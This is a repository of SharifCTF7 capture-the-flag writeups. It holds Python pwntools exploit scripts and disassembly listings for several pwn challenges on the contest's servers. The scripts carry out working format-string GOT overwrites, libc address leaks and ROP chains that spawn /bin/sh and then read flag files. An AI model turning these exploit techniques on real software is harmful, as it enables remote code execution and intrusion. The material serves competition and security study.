19 |     a = r.recv(1024)[4:].strip()
20 |     b.write(a + "\x00")
21 |     t += len(a) + 1
22 |     print hexdump(a)
23 | b.close()
24 | r.interactive()
25 | 
26 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/NoMoreBlind/pwn_NoMoreBlind_sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | """
 4 | $ cat /home/rooney/suctf/NoMoreBlind/flag
 5 | SharifCTF{0cc2a912c724c37492df58182c6571c1}
 6 | 
 7 | """
 8 | 
 9 | from pwn import *
10 | 
11 | e = ELF("./libc.so.6")
12 | 
13 | system = e.symbols["system"]
14 | strlen_got = 0x8049978
15 | fflush_got = 0x8049960
16 | setvbuf_got = 0x8049980
17 | alarm_got = 0x804996c
18 | fgets_got = 0x8049964
19 | 
20 | r = remote("ctf.sharif.edu", 54518)
21 | 
22 | r.sendline("%2$x")
23 | r.recvuntil("bytes\n")
24 | leak = int(r.recvline().strip(), 16)
25 | 
26 | r.sendline(p32(fflush_got)+"%4$s")
27 | r.recvuntil("bytes\n")
28 | a = r.recv(1024).strip()
29 | #print hexdump(a)
30 | a = a[4:]
31 | fflush_leak = u32(a[:4])
32 | print "fflush_leak", hex(fflush_leak)
33 | 
34 | libc_base = fflush_leak - e.symbols["fflush"]
35 | print "libc_base", hex(libc_base)
36 | 
37 | system += libc_base + 0x2f0 - 0x10
38 | print "system", hex(system)
39 | system_off_l = system & 0xFFFF
40 | system_off_u = (system >> 16) & 0xFFFF
41 | print "system_offset", hex(system_off_l)
42 | print "system_offset", hex(system_off_u)
43 | 
44 | r.sendline(p32(strlen_got)+p32(strlen_got+2)+p32(strlen_got+1)+"%{}x%4$hn%{}x%5$hn%6$s".format(system_off_l-0xc, system_off_u-system_off_l))
45 | #r.recvuntil("f7")
46 | r.recv()
47 | #print hexdump(r.recv(1024))
48 | 
49 | #r.sendline(";/bin/sh;")
50 | r.sendline("/bin/sh;")
51 | r.sendline("cat /home/rooney/suctf/NoMoreBlind/flag")
52 | r.recvuntil("SharifCTF")
53 | print "flag: SharifCTF" + r.recv()
54 | #r.interactive()
55 | r.close()
56 | 
57 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/NoMoreBlind/pwn_NoMoreBlind_text.txt:
--------------------------------------------------------------------------------
  1 |  # plt
  2 |  8048410:	ff 25 60 99 04 08    	jmp    DWORD PTR ds:	
  3 |  8048416:	68 08 00 00 00       	push   0x8
  4 |  804841b:	e9 d0 ff ff ff       	jmp    0x80483f0
  5 |  8048420:	ff 25 64 99 04 08    	jmp    DWORD PTR ds:0x8049964
  6 |  8048426:	68 10 00 00 00       	push   0x10
  7 |  804842b:	e9 c0 ff ff ff       	jmp    0x80483f0
  8 |  8048430:	ff 25 68 99 04 08    	jmp    DWORD PTR ds:0x8049968
  9 |  8048436:	68 18 00 00 00       	push   0x18
 10 |  804843b:	e9 b0 ff ff ff       	jmp    0x80483f0
 11 |  8048440:	ff 25 6c 99 04 08    	jmp    DWORD PTR ds:0x804996c
 12 |  8048446:	68 00 00 00 00       	push   0x0
 13 |  804844b:	e9 a0 ff ff ff       	jmp    0x80483f0
 14 |  8048450:	ff 25 70 99 04 08    	jmp    DWORD PTR ds:0x8049970
 15 |  8048456:	68 28 00 00 00       	push   0x28
 16 |  804845b:	e9 90 ff ff ff       	jmp    0x80483f0
 17 |  8048460:	ff 25 74 99 04 08    	jmp    DWORD PTR ds:0x8049974
 18 |  8048466:	68 30 00 00 00       	push   0x30
 19 |  804846b:	e9 80 ff ff ff       	jmp    0x80483f0
 20 |  8048470:	ff 25 78 99 04 08    	jmp    DWORD PTR ds:0x8049978
 21 |  8048476:	68 38 00 00 00       	push   0x38
 22 |  804847b:	e9 70 ff ff ff       	jmp    0x80483f0
 23 |  8048480:	ff 25 7c 99 04 08    	jmp    DWORD PTR ds:0x804997c
 24 |  8048486:	68 40 00 00 00       	push   0x40
 25 |  804848b:	e9 60 ff ff ff       	jmp    0x80483f0
 26 |  8048490:	ff 25 80 99 04 08    	jmp    DWORD PTR ds:0x8049980
 27 |  8048496:	68 48 00 00 00       	push   0x48
 28 |  804849b:	e9 50 ff ff ff       	jmp    0x80483f0
 29 |  80484a0:	31 ed                	xor    ebp,ebp
 30 | 
 31 | # main
 32 |  80485b5:	55                   	push   ebp
 33 |  80485b6:	89 e5                	mov    ebp,esp
 34 |  80485b8:	57                   	push   edi
 35 |  80485b9:	51                   	push   ecx
 36 |  80485ba:	81 ec 00 04 00 00    	sub    esp,0x400
 37 |  80485c0:	8d 95 f8 fb ff ff    	lea    edx,[ebp-0x408]
 38 |  80485c6:	b8 00 00 00 00       	mov    eax,0x0
 39 |  80485cb:	b9 00 01 00 00       	mov    ecx,0x100
 40 |  80485d0:	89 d7                	mov    edi,edx
 41 |  80485d2:	f3 ab                	rep stos DWORD PTR es:[edi],eax
 42 |  80485d4:	a1 a0 99 04 08       	mov    eax,ds:0x80499a0
 43 |  80485d9:	6a 00                	push   0x0
 44 |  80485db:	6a 02                	push   0x2
 45 |  80485dd:	6a 00                	push   0x0
 46 |  80485df:	50                   	push   eax
 47 |  80485e0:	e8 ab fe ff ff       	call   0x8048490 #setvbuf
 48 | 
 49 |  80485e5:	83 c4 10             	add    esp,0x10
 50 |  80485e8:	a1 c0 99 04 08       	mov    eax,ds:0x80499c0
 51 |  80485ed:	6a 00                	push   0x0
 52 |  80485ef:	6a 02                	push   0x2
 53 |  80485f1:	6a 00                	push   0x0
 54 |  80485f3:	50                   	push   eax
 55 |  80485f4:	e8 97 fe ff ff       	call   0x8048490 #setvbuf
 56 | 
 57 |  80485f9:	83 c4 10             	add    esp,0x10
 58 |  80485fc:	83 ec 08             	sub    esp,0x8
 59 |  80485ff:	68 9b 85 04 08       	push   0x804859b
 60 |  8048604:	6a 0e                	push   0xe
 61 |  8048606:	e8 25 fe ff ff       	call   0x8048430 # signal
 62 | 
 63 |  804860b:	83 c4 10             	add    esp,0x10
 64 |  804860e:	83 ec 0c             	sub    esp,0xc
 65 |  8048611:	6a 3c                	push   0x3c
 66 |  8048613:	e8 28 fe ff ff       	call   0x8048440 #alarm
 67 | 
 68 |  8048618:	83 c4 10             	add    esp,0x10
 69 |  804861b:	a1 a0 99 04 08       	mov    eax,ds:0x80499a0
 70 |  8048620:	83 ec 04             	sub    esp,0x4
 71 |  8048623:	50                   	push   eax
 72 |  8048624:	68 00 04 00 00       	push   0x400
 73 |  8048629:	8d 85 f8 fb ff ff    	lea    eax,[ebp-0x408]
 74 |  804862f:	50                   	push   eax
 75 |  8048630:	e8 eb fd ff ff       	call   0x8048420 #fgets
 76 | 
 77 |  8048635:	83 c4 10             	add    esp,0x10
 78 |  8048638:	85 c0                	test   eax,eax
 79 |  804863a:	75 07                	jne    0x8048643
 80 |  804863c:	b8 01 00 00 00       	mov    eax,0x1
 81 |  8048641:	eb 48                	jmp    0x804868b =>
 82 |  8048643:	83 ec 0c             	sub    esp,0xc
 83 |  8048646:	8d 85 f8 fb ff ff    	lea    eax,[ebp-0x408]
 84 |  804864c:	50                   	push   eax
 85 |  804864d:	e8 1e fe ff ff       	call   0x8048470 # strlen
 86 | 
 87 |  8048652:	83 c4 10             	add    esp,0x10
 88 |  8048655:	83 ec 08             	sub    esp,0x8
 89 |  8048658:	50                   	push   eax
 90 |  8048659:	68 30 87 04 08       	push   0x8048730 # Printing %d bytes
 91 |  804865e:	e8 9d fd ff ff       	call   0x8048400 # printf
 92 | 
 93 |  8048663:	83 c4 10             	add    esp,0x10
 94 |  8048666:	83 ec 0c             	sub    esp,0xc
 95 |  8048669:	8d 85 f8 fb ff ff    	lea    eax,[ebp-0x408]
 96 |  804866f:	50                   	push   eax
 97 |  8048670:	e8 8b fd ff ff       	call   0x8048400 # printf
 98 | 
 99 |  8048675:	83 c4 10             	add    esp,0x10
100 |  8048678:	a1 c0 99 04 08       	mov    eax,ds:0x80499c0
101 |  804867d:	83 ec 0c             	sub    esp,0xc
102 |  8048680:	50                   	push   eax
103 |  8048681:	e8 8a fd ff ff       	call   0x8048410 # fflush
104 | 
105 |  8048686:	83 c4 10             	add    esp,0x10
106 |  8048689:	eb 90                	jmp    0x804861b
107 |  804868b:	8d 65 f8             	lea    esp,[ebp-0x8]
108 |  804868e:	59                   	pop    ecx
109 |  804868f:	5f                   	pop    edi
110 |  8048690:	5d                   	pop    ebp
111 |  8048691:	8d 61 fc             	lea    esp,[ecx-0x4]
112 |  8048694:	c3                   	ret    
113 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/guess/sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | """
 4 | $ python s.py 
 5 | [+] Opening connection to ctf.sharif.edu on port 54517: Done
 6 | Try #136: %136$llx
 7 | Try #137: %137$llx
 8 | Try #138: %138$llx
 9 | Try #139: %139$llx
10 | Try #140: %140$llx
11 | Try #141: %141$llx
12 | [*] Closed connection to ctf.sharif.edu port 54517
13 | flag:  SharifCTF{a5d428632ccc7bfd357c6a128a78a58c}
14 | """
15 | 
16 | from pwn import *
17 | r = remote("ctf.sharif.edu", 54517)
18 | flag = ""
19 | 
20 | for j in range(136, 142):
21 |     print "Try #{}: {}".format(j, "%{}$llx".format(j))
22 |     r.sendline("%{}$llx".format(j))
23 |     r.recvuntil("somewhere.\n")
24 |     f = r.recv(1024).strip()
25 |     flag += f.decode("hex")[::-1]
26 | 
27 | r.close()
28 | 
29 | print "flag: ", flag.split("\00")[0]
30 | 
31 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/hippotie/pwn_hippotie_sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | """
 4 | $ cat /home/rooney/suctf/Hippotie/flag
 5 | SharifCTF{6b41e2849ed05d82e55ff730911bd8fb}
 6 | """
 7 | 
 8 | from pwn import *
 9 | 
10 | printf_plt = 0x0000000000400816
11 | puts_plt = 0x4007f0
12 | main = 0x401365
13 | printf_got = 0x00000000006027B8
14 | pop_rdi = 0x0000000000401483
15 | 
16 | libc_got = 0x6027d0
17 | 
18 | e = ELF("./libc.so.6")
19 | 
20 | #r = process("./hippotie")
21 | r = remote("ctf.sharif.edu", 54519)
22 | #r = remote("localhost", 5000)
23 | 
24 | raw_input("$ ")
25 | 
26 | r.sendlineafter("> ", "1")
27 | 
28 | r.sendlineafter("Name: ", "teet")
29 | r.sendlineafter("Password: ", "teet")
30 | 
31 | r.sendlineafter("> ", "2")
32 | # calculated using gdb
33 | r.sendlineafter("Name: ", "\x11")
34 | r.sendlineafter("Password: ", "\x11")
35 | 
36 | assert "Successfully Logged In!" in r.recvuntil("> ")
37 | 
38 | r.sendline("3")
39 | r.sendlineafter("to pack? ", "A"*0x218+p64(pop_rdi)+p64(printf_got)+p64(puts_plt)+p64(main)) # run main again
40 | 
41 | r.sendlineafter("> ", "4")
42 | 
43 | r.recvline()
44 | printf_leak = u64(r.recv(6).ljust(8, "\x00"))
45 | print "printf_leak", hex(printf_leak)
46 | 
47 | libc_base = printf_leak - e.symbols["printf"]
48 | system = libc_base + e.symbols["system"]
49 | bin_sh = libc_base + next(e.search("/bin/sh"))
50 | r.sendline("3")
51 | r.sendlineafter("to pack? ", "A"*0x218+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(main))
52 | 
53 | r.sendlineafter("> ", "4")
54 | 
55 | #r.interactive()
56 | r.sendline("cat /home/rooney/suctf/Hippotie/flag")
57 | r.recv()
58 | 
59 | print "flag: ", r.recv()
60 | r.close()
61 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/persian/pwn_persian_leak_text.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # objdump -Mintel,x86-64 -b binary -m i386 --adjust-vma=0x400601 -D binary
 4 | 
 5 | t = 0
 6 | ttext = ""
 7 | ff = open("binary", "w")
 8 | from pwn import *
 9 | #r = remote("ctf.sharif.edu", 54517)
10 | for j in range(1, 500):
11 |     r = remote("ctf.sharif.edu", 54514)
12 |     try:
13 |         b = 0x400601
14 |         print "Try #{}: {}".format(j, "{}".format(hex(b+t)))
15 |         r.sendline("%00009$s"+p64(b+t))
16 |         try:
17 |             addr = r.recv(1024)
18 |             print len(addr)
19 |             addr = addr[:-3]
20 |             ttext += (addr + "\x00")
21 |             ff.write(addr + "\x00")
22 |             t += len(addr) + 1
23 |             print "recv", addr, hexdump(addr)
24 |             #addr = int(addr.strip(), 16)
25 |         except Exception as e:
26 |             print "addr", e
27 |             ttext += "\x00"
28 |             ff.write("\x00")
29 |             t += 1
30 |             addr = 0
31 |         r.close()
32 |     except Exception as e:
33 |         t += 1 
34 |         print e
35 |         continue
36 | 
37 | ff.close()
38 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/persian/pwn_persian_sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | """
 4 | $ cat home/rooney/suctf/Persian/flag
 5 | SharifCTF{369f022987ad5ad79ad026d88d194a16}
 6 | """
 7 | 
 8 | from pwn import *
 9 | e = ELF("./libc.so.6") # Debian jessie 8 x86_64 libc
10 | 
11 | bin_sh = next(e.search("/bin/sh"))
12 | system = e.symbols["system"]
13 | pop_rdi = 0x0000000000022482
14 | 
15 | r = remote("ctf.sharif.edu", 54514)
16 | libc_base = 0
17 | r.sendline("%00009$s"+p64(0x600c80))
18 | addr = r.recv(1024)
19 | #print "recv", addr, "+++++++++++++", hexdump(addr)
20 | addr = u64(addr[:6].ljust(8, "\x00"))
21 | print "printf", hex(addr)
22 | libc_base = addr - 0x0000000000069df0
23 | print "libc_base", hex(libc_base)
24 | 
25 | bin_sh += libc_base
26 | system += libc_base
27 | pop_rdi += libc_base
28 | 
29 | r.sendline("A"*0x818+p64(pop_rdi)+p64(bin_sh)+p64(system))
30 | #r.interactive()
31 | r.sendline("cat home/rooney/suctf/Persian/flag")
32 | r.recv()
33 | r.recv()
34 | print "flag: ", r.recv()
35 | r.close()
36 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/persian/pwn_persian_text.txt:
--------------------------------------------------------------------------------
  1 | 
  2 | binary:     file format binary
  3 | 
  4 | 
  5 | Disassembly of section .data:
  6 | 
  7 | 00400601 <.data>:
  8 |   400601:	25 6a 06 20 00       	and    eax,0x20066a
  9 |   400606:	68 02 00 00 00       	push   0x2
 10 |   40060b:	e9 c0 ff ff ff       	jmp    0x4005d0
 11 |   400610:	ff 25 62 06 20 00    	jmp    QWORD PTR [rip+0x200662]        # 0x600c78
 12 |   400616:	68 03 00 00 00       	push   0x3
 13 |   40061b:	e9 b0 ff ff ff       	jmp    0x4005d0
 14 |   400620:	ff 25 5a 06 20 00    	jmp    QWORD PTR [rip+0x20065a]        # 0x600c80
 15 |   400626:	68 04 00 00 00       	push   0x4
 16 |   40062b:	e9 a0 ff ff ff       	jmp    0x4005d0
 17 |   400630:	ff 25 52 06 20 00    	jmp    QWORD PTR [rip+0x200652]        # 0x600c88
 18 |   400636:	68 05 00 00 00       	push   0x5
 19 |   40063b:	e9 90 ff ff ff       	jmp    0x4005d0
 20 |   400640:	ff 25 4a 06 20 00    	jmp    QWORD PTR [rip+0x20064a]        # 0x600c90
 21 |   400646:	68 06 00 00 00       	push   0x6
 22 |   40064b:	e9 80 ff ff ff       	jmp    0x4005d0
 23 |   400650:	ff 25 42 06 20 00    	jmp    QWORD PTR [rip+0x200642]        # 0x600c98
 24 |   400656:	68 07 00 00 00       	push   0x7
 25 |   40065b:	e9 70 ff ff ff       	jmp    0x4005d0
 26 |   400660:	ff 25 3a 06 20 00    	jmp    QWORD PTR [rip+0x20063a]        # 0x600ca0
 27 |   400666:	68 08 00 00 00       	push   0x8
 28 |   40066b:	e9 60 ff ff ff       	jmp    0x4005d0
 29 |   400670:	ff 25 32 06 20 00    	jmp    QWORD PTR [rip+0x200632]        # 0x600ca8
 30 |   400676:	68 09 00 00 00       	push   0x9
 31 |   40067b:	e9 50 ff ff ff       	jmp    0x4005d0
 32 |   400680:	31 ed                	xor    ebp,ebp
 33 |   400682:	49 89 d1             	mov    r9,rdx
 34 |   400685:	5e                   	pop    rsi
 35 |   400686:	48 89 e2             	mov    rdx,rsp
 36 |   400689:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
 37 |   40068d:	50                   	push   rax
 38 |   40068e:	54                   	push   rsp
 39 |   40068f:	49 c7 c0 f0 08 40 00 	mov    r8,0x4008f0
 40 |   400696:	48 c7 c1 80 08 40 00 	mov    rcx,0x400880
 41 |   40069d:	48 c7 c7 8b 07 40 00 	mov    rdi,0x40078b
 42 |   4006a4:	e8 67 ff ff ff       	call   0x400610
 43 |   4006a9:	f4                   	hlt    
 44 |   4006aa:	66 0f 1f 44 00 00    	nop    WORD PTR [rax+rax*1+0x0]
 45 |   4006b0:	b8 c7 0c 60 00       	mov    eax,0x600cc7
 46 |   4006b5:	55                   	push   rbp
 47 |   4006b6:	48 2d c0 0c 60 00    	sub    rax,0x600cc0
 48 |   4006bc:	48 83 f8 0e          	cmp    rax,0xe
 49 |   4006c0:	48 89 e5             	mov    rbp,rsp
 50 |   4006c3:	76 1b                	jbe    0x4006e0
 51 |   4006c5:	b8 00 00 00 00       	mov    eax,0x0
 52 |   4006ca:	48 85 c0             	test   rax,rax
 53 |   4006cd:	74 11                	je     0x4006e0
 54 |   4006cf:	5d                   	pop    rbp
 55 |   4006d0:	bf c0 0c 60 00       	mov    edi,0x600cc0
 56 |   4006d5:	ff e0                	jmp    rax
 57 |   4006d7:	66 0f 1f 84 00 00 00 	nop    WORD PTR [rax+rax*1+0x0]
 58 |   4006de:	00 00 
 59 |   4006e0:	5d                   	pop    rbp
 60 |   4006e1:	c3                   	ret    
 61 |   4006e2:	66 66 66 66 66 2e 0f 	data32 data32 data32 data32 nop WORD PTR cs:[rax+rax*1+0x0]
 62 |   4006e9:	1f 84 00 00 00 00 00 
 63 |   4006f0:	be c0 0c 60 00       	mov    esi,0x600cc0
 64 |   4006f5:	55                   	push   rbp
 65 |   4006f6:	48 81 ee c0 0c 60 00 	sub    rsi,0x600cc0
 66 |   4006fd:	48 c1 fe 03          	sar    rsi,0x3
 67 |   400701:	48 89 e5             	mov    rbp,rsp
 68 |   400704:	48 89 f0             	mov    rax,rsi
 69 |   400707:	48 c1 e8 3f          	shr    rax,0x3f
 70 |   40070b:	48 01 c6             	add    rsi,rax
 71 |   40070e:	48 d1 fe             	sar    rsi,1
 72 |   400711:	74 15                	je     0x400728
 73 |   400713:	b8 00 00 00 00       	mov    eax,0x0
 74 |   400718:	48 85 c0             	test   rax,rax
 75 |   40071b:	74 0b                	je     0x400728
 76 |   40071d:	5d                   	pop    rbp
 77 |   40071e:	bf c0 0c 60 00       	mov    edi,0x600cc0
 78 |   400723:	ff e0                	jmp    rax
 79 |   400725:	0f 1f 00             	nop    DWORD PTR [rax]
 80 |   400728:	5d                   	pop    rbp
 81 |   400729:	c3                   	ret    
 82 |   40072a:	66 0f 1f 44 00 00    	nop    WORD PTR [rax+rax*1+0x0]
 83 |   400730:	80 3d 99 05 20 00 00 	cmp    BYTE PTR [rip+0x200599],0x0        # 0x600cd0
 84 |   400737:	75 11                	jne    0x40074a
 85 |   400739:	55                   	push   rbp
 86 |   40073a:	48 89 e5             	mov    rbp,rsp
 87 |   40073d:	e8 6e ff ff ff       	call   0x4006b0
 88 |   400742:	5d                   	pop    rbp
 89 |   400743:	c6 05 86 05 20 00 01 	mov    BYTE PTR [rip+0x200586],0x1        # 0x600cd0
 90 |   40074a:	f3 c3                	repz ret 
 91 |   40074c:	0f 1f 40 00          	nop    DWORD PTR [rax+0x0]
 92 |   400750:	bf 68 0a 60 00       	mov    edi,0x600a68
 93 |   400755:	48 83 3f 00          	cmp    QWORD PTR [rdi],0x0
 94 |   400759:	75 05                	jne    0x400760
 95 |   40075b:	eb 93                	jmp    0x4006f0
 96 |   40075d:	0f 1f 00             	nop    DWORD PTR [rax]
 97 |   400760:	b8 00 00 00 00       	mov    eax,0x0
 98 |   400765:	48 85 c0             	test   rax,rax
 99 |   400768:	74 f1                	je     0x40075b
100 | 
101 | 
102 |   40076a:	55                   	push   rbp
103 |   40076b:	48 89 e5             	mov    rbp,rsp
104 |   40076e:	ff d0                	call   rax
105 |   400770:	5d                   	pop    rbp
106 |   400771:	e9 7a ff ff ff       	jmp    0x4006f0
107 | 
108 | # main
109 |   400776:	55                   	push   rbp
110 |   400777:	48 89 e5             	mov    rbp,rsp
111 |   40077a:	48 83 ec 10          	sub    rsp,0x10
112 |   40077e:	89 7d fc             	mov    DWORD PTR [rbp-0x4],edi
113 |   400781:	bf 01 00 00 00       	mov    edi,0x1
114 |   400786:	e8 e5 fe ff ff       	call   0x400670
115 |   40078b:	55                   	push   rbp
116 |   40078c:	48 89 e5             	mov    rbp,rsp
117 |   40078f:	48 81 ec 20 08 00 00 	sub    rsp,0x820
118 |   400796:	89 bd ec f7 ff ff    	mov    DWORD PTR [rbp-0x814],edi
119 |   40079c:	48 89 b5 e0 f7 ff ff 	mov    QWORD PTR [rbp-0x820],rsi
120 |   4007a3:	48 8b 05 1e 05 20 00 	mov    rax,QWORD PTR [rip+0x20051e]        # 0x600cc8
121 |   4007aa:	b9 00 00 00 00       	mov    ecx,0x0
122 |   4007af:	ba 02 00 00 00       	mov    edx,0x2
123 |   4007b4:	be 00 00 00 00       	mov    esi,0x0
124 |   4007b9:	48 89 c7             	mov    rdi,rax
125 |   4007bc:	e8 9f fe ff ff       	call   0x400660
126 |   4007c1:	48 8b 05 f8 04 20 00 	mov    rax,QWORD PTR [rip+0x2004f8]        # 0x600cc0
127 |   4007c8:	b9 00 00 00 00       	mov    ecx,0x0
128 |   4007cd:	ba 02 00 00 00       	mov    edx,0x2
129 |   4007d2:	be 00 00 00 00       	mov    esi,0x0
130 |   4007d7:	48 89 c7             	mov    rdi,rax
131 |   4007da:	e8 81 fe ff ff       	call   0x400660
132 |   4007df:	be 76 07 40 00       	mov    esi,0x400776
133 |   4007e4:	bf 0e 00 00 00       	mov    edi,0xe
134 |   4007e9:	e8 42 fe ff ff       	call   0x400630
135 |   4007ee:	bf 3c 00 00 00       	mov    edi,0x3c
136 |   4007f3:	e8 08 fe ff ff       	call   0x400600
137 |   4007f8:	c7 45 fc 00 00 00 00 	mov    DWORD PTR [rbp-0x4],0x0
138 |   4007ff:	c7 45 fc 00 00 00 00 	mov    DWORD PTR [rbp-0x4],0x0
139 |   400806:	eb 64                	jmp    0x40086c
140 |   400808:	48 8b 15 b9 04 20 00 	mov    rdx,QWORD PTR [rip+0x2004b9]        # 0x600cc8
141 |   40080f:	48 8d 85 f0 f7 ff ff 	lea    rax,[rbp-0x810]
142 |   400816:	be 00 09 00 00       	mov    esi,0x900
143 |   40081b:	48 89 c7             	mov    rdi,rax
144 |   40081e:	e8 fd fd ff ff       	call   0x400620
145 |   400823:	48 85 c0             	test   rax,rax
146 |   400826:	75 02                	jne    0x40082a
147 |   400828:	eb 4d                	jmp    0x400877
148 |   40082a:	48 8d 85 f0 f7 ff ff 	lea    rax,[rbp-0x810]
149 |   400831:	be 6e 00 00 00       	mov    esi,0x6e
150 |   400836:	48 89 c7             	mov    rdi,rax
151 |   400839:	e8 a2 fd ff ff       	call   0x4005e0
152 |   40083e:	48 85 c0             	test   rax,rax
153 |   400841:	74 02                	je     0x400845
154 |   400843:	eb 23                	jmp    0x400868
155 |   400845:	48 8d 85 f0 f7 ff ff 	lea    rax,[rbp-0x810]
156 |   40084c:	48 89 c7             	mov    rdi,rax
157 |   40084f:	b8 00 00 00 00       	mov    eax,0x0
158 |   400854:	e8 97 fd ff ff       	call   0x4005f0
159 |   400859:	48 8b 05 60 04 20 00 	mov    rax,QWORD PTR [rip+0x200460]        # 0x600cc0
160 |   400860:	48 89 c7             	mov    rdi,rax
161 |   400863:	e8 e8 fd ff ff       	call   0x400650
162 |   400868:	83 45 fc 01          	add    DWORD PTR [rbp-0x4],0x1
163 |   40086c:	83 7d fc 01          	cmp    DWORD PTR [rbp-0x4],0x1
164 |   400870:	7e 96                	jle    0x400808
165 |   400872:	b8 01 00 00 00       	mov    eax,0x1
166 |   400877:	c9                   	leave  
167 |   400878:	c3                   	ret    
168 | 
169 | 
170 |   400879:	0f 1f 80 00 00 00 00 	nop    DWORD PTR [rax+0x0]
171 |   400880:	41 57                	push   r15
172 |   400882:	41 89 ff             	mov    r15d,edi
173 |   400885:	41 56                	push   r14
174 |   400887:	49 89 f6             	mov    r14,rsi
175 |   40088a:	41 55                	push   r13
176 |   40088c:	49 89 d5             	mov    r13,rdx
177 |   40088f:	41 54                	push   r12
178 |   400891:	4c 8d 25 c0 01 20 00 	lea    r12,[rip+0x2001c0]        # 0x600a58
179 |   400898:	55                   	push   rbp
180 |   400899:	48 8d 2d c0 01 20 00 	lea    rbp,[rip+0x2001c0]        # 0x600a60
181 |   4008a0:	53                   	push   rbx
182 |   4008a1:	4c 29 e5             	sub    rbp,r12
183 |   4008a4:	31 db                	xor    ebx,ebx
184 |   4008a6:	48 c1 fd 03          	sar    rbp,0x3
185 |   4008aa:	48 83 ec 08          	sub    rsp,0x8
186 |   4008ae:	e8 fd fc ff ff       	call   0x4005b0
187 |   4008b3:	48 85 ed             	test   rbp,rbp
188 |   4008b6:	74 1e                	je     0x4008d6
189 |   4008b8:	0f 1f 84 00 00 00 00 	nop    DWORD PTR [rax+rax*1+0x0]
190 |   4008bf:	00 
191 |   4008c0:	4c 89 ea             	mov    rdx,r13
192 |   4008c3:	4c 89 f6             	mov    rsi,r14
193 |   4008c6:	44 89 ff             	mov    edi,r15d
194 |   4008c9:	41 ff 14 dc          	call   QWORD PTR [r12+rbx*8]
195 |   4008cd:	48 83 c3 01          	add    rbx,0x1
196 |   4008d1:	48 39 eb             	cmp    rbx,rbp
197 |   4008d4:	75 ea                	jne    0x4008c0
198 |   4008d6:	48 83 c4 08          	add    rsp,0x8
199 |   4008da:	5b                   	pop    rbx
200 |   4008db:	5d                   	pop    rbp
201 |   4008dc:	41 5c                	pop    r12
202 |   4008de:	41 5d                	pop    r13
203 |   4008e0:	41 5e                	pop    r14
204 |   4008e2:	41 5f                	pop    r15
205 |   4008e4:	c3                   	ret    
206 |   4008e5:	66 66 2e 0f 1f 84 00 	data32 nop WORD PTR cs:[rax+rax*1+0x0]
207 |   4008ec:	00 00 00 00 
208 |   4008f0:	f3 c3                	repz ret 
209 |   4008f2:	00 00                	add    BYTE PTR [rax],al
210 |   4008f4:	48 83 ec 08          	sub    rsp,0x8
211 |   4008f8:	48 83 c4 08          	add    rsp,0x8
212 |   4008fc:	c3                   	ret    
213 | 	...
214 | 
215 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/tehran/pwn_tehran_sol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from pwn import *
 4 | 
 5 | """
 6 | $ cat /home/rooney/suctf/Tehran/flag
 7 | SharifCTF{ed22e592957fbae123d1bd45e0677b52}
 8 | """
 9 | 
10 | r = remote("ctf.sharif.edu", 54515)
11 | #r = process("./tehran")
12 | e = ELF("./libc.so.6")
13 | #e = ELF("/lib/i386-linux-gnu/libc-2.19.so")
14 | raw_input("$ ")
15 | strstr_got = 0x804c104
16 | 
17 | #puts("%2052x%1$hn%44930x%2$hn", 0x0804C006, 0x0804C004);  # fini_array (not needed)
18 | 
19 | # mprotect_got -> main 
20 | first = """
21 | begin()
22 | {
23 | puts("%2052x%1$hn%44930x%2$hn", 0x804c10a, 0x804c108);  
24 | puts("AAAA%sZZZZ", 0x804c104); 
25 | fillout();
26 | }
27 | EOF
28 | """
29 | r.sendline(first)
30 | r.recvuntil("AAAA")
31 | strstr_got = u32(r.recvuntil("ZZZZ")[:4])
32 | print "strstr_got", hex(strstr_got)
33 | libc_base = strstr_got - e.symbols["strstr"]
34 | print "libc_base", hex(libc_base)
35 | 
36 | system = libc_base + e.symbols["system"] + 0x290
37 | #system = libc_base + e.symbols["system"]
38 | print "system", hex(system)
39 | second = """
40 | begin()
41 | {
42 | """
43 | 
44 | second += "puts(\"%{}x%1$hn%{}x%2$hn\", 0x804c104, 0x804c106); ".format(system & 0xffff, ((system >> 16) & 0xffff) - (system & 0xffff))
45 | 
46 | second += """
47 | fillout();
48 | }
49 | EOF
50 | """
51 | #print second
52 | 
53 | r.sendline(second)
54 | r.sendline("/bin/sh;")
55 | r.sendline("cat /home/rooney/suctf/Tehran/flag")
56 | #r.interactive()
57 | r.recvuntil("SharifCTF")
58 | print "flag: SharifCTF" + r.recvuntil("}")
59 | r.close()
60 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/README.md:
--------------------------------------------------------------------------------
 1 | # SharifCTF7 writeups
 2 | 
 3 | ### Table of contents
 4 | * **Crypto**
 5 | 
 6 |   [Unterscheide 200](Crypto/Unterscheide)
 7 |   
 8 |   [Lobotomized LSB Oracle 400](Crypto/lobotomized_lsb_oracle)
 9 |   
10 |   [LSB Oracle 150](Crypto/lsb_oracle)
11 | 
12 |   [TPQ 150](Crypto/TPQ)
13 | 
14 |   [XOR 150](Crypto/XOR)
15 |   
16 | * **Forensics**
17 | 
18 |   [Locky 300](Forensics/Locky)
19 |   
20 |   [Pretty Slim 200](Forensics/pretty_slim)
21 |   
22 |   [Synced 150](Forensics/synced)
23 |   
24 |   [Bsniff 200](Forensics/Bsniff)
25 |   
26 |   [Strange PDF 150](Forensics/Bsniff)
27 | 
28 | * **Misc**
29 | 
30 |   [Camera Model 100](Misc/camera_model)
31 |   
32 |   [Find Login 200](Misc/find_login)
33 |   
34 |   [Lesula Isola 150](Misc/lesula_isola)
35 |   
